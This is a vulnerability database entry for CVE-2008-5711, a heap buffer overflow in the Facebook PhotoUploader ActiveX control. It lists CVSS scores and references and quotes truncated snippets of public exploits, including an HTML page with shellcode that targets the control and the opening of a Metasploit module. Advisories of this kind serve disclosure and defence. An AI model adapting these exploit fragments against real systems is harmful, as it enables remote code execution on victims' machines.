Published: 24/12/2008 Updated: 29/09/2017

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 945

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Heap-based buffer overflow in the Facebook PhotoUploader ActiveX control 5.0.14.0 and previous versions allows remote malicious users to execute arbitrary code via a long FileMask property value.

Vulnerable Product	Search on Vulmon	Subscribe to Product
facebook photouploader 4.5.57.0
facebook photouploader

<!-- FaceBook PhotoUploader Buffer Overflow Exploit written by eb Tested on Windows XP SP2(fully patched) English, IE6, ImageUploader4ocx 45570(FaceBookPhotoUploader2cab) The following controls are also vulnerable: Aurigma ImageUploader4 45700 and 451260 ----------------------------- {6E5E167B-1566-4316-B27F-0DDAB3484CF7} Buffer ...

<html> <head> <object id="target" classid="clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0"></object> </head> <body> <script> var shellcode = unescape("%u0D0D%u0D0D%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee% ...

## # $Id: facebook_extractiptcrb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' c ...

CWE-119 http://www.securityfocus.com/bid/27756 http://securityreason.com/securityalert/4805 https://www.exploit-db.com/exploits/5102 https://nvd.nist.gov https://www.exploit-db.com/exploits/5049/

CVE-2008-5711

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect